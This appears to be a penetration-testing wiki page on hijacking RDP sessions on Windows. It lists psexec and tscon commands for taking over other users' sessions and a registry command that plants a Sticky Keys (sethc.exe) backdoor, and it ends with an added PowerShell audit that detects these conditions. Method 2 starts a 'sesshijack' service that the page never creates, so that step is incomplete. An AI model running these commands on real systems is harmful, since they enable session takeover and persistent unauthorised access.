From pentestwiki.org

Exploitation RDP 2011

Technique: Any user on a local system holding NT AUTHORITY\SYSTEM privileges can take over any RDP session established on that machine without knowing its credentials (roughly the equivalent of "su - user" as root on Linux). The legitimate user is logged out immediately.

The same can be done from Task Manager alone (or with tscon.exe / tsadmin.msc) as an administrator: right-click the session and choose "Connect".

Method 1

C:>psexec -s \\localhost cmd

Method 2

C:>query user
C:>net start sesshijack

Method 3 (prompts for the password when run as a normal user; no password needed when run as SYSTEM)

C:>query user
C:>tscon <ID>

Method 4 (physical access, boot backdoor)

Sticky Keys (sethc.exe)

C:>REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Reboot, then at the login screen press a key five times to trigger Sticky Keys (or press F5).
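A defender-side audit for the two conditions the methods above depend on (an Image File Execution Options Debugger value hijacking sethc.exe, and disconnected RDP sessions left to linger for tscon to attach to), written here as an added example and not taken from the original wiki page. It assumes the Group Policy "Set time limit for disconnected sessions" is stored as MaxDisconnectionTime (milliseconds) under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services; run it in an elevated PowerShell.

```powershell
# Added audit script (not from the original page). Run elevated.

# 1) Flag every IFEO entry that carries a Debugger value. This is the mechanism the
#    sethc.exe backdoor above abuses, so any such value should be explained or removed.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$hijacks = Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
    $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) { [PSCustomObject]@{ Image = $_.PSChildName; Debugger = $dbg } }
}
if ($hijacks) {
    Write-Warning 'IFEO Debugger values present (verify each one; remove if unauthorised):'
    $hijacks | Format-Table -AutoSize
    # Remediation for the sethc.exe case from this page, once confirmed unauthorised:
    # Remove-ItemProperty -Path "$ifeo\sethc.exe" -Name Debugger
} else {
    Write-Output 'No IFEO Debugger values found.'
}

# 2) Check whether disconnected RDP sessions are allowed to linger. Hijacking with
#    tscon needs a disconnected session to attach to; a disconnect time limit shrinks
#    that window. Assumption: the policy lives in MaxDisconnectionTime (milliseconds).
$tsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$limit = (Get-ItemProperty -Path $tsPolicy -Name MaxDisconnectionTime -ErrorAction SilentlyContinue).MaxDisconnectionTime
if (-not $limit) {
    # $null (policy not set) and 0 (never) both mean sessions stay disconnected indefinitely.
    Write-Warning 'No time limit for disconnected RDP sessions is configured.'
} else {
    Write-Output ("Disconnected sessions are ended after {0} minutes." -f ($limit / 60000))
}

# 3) List the sessions currently in the Disc(onnected) state, i.e. what an account
#    running as SYSTEM could attach to right now.
query user 2>$null | Select-String -Pattern 'Disc'
```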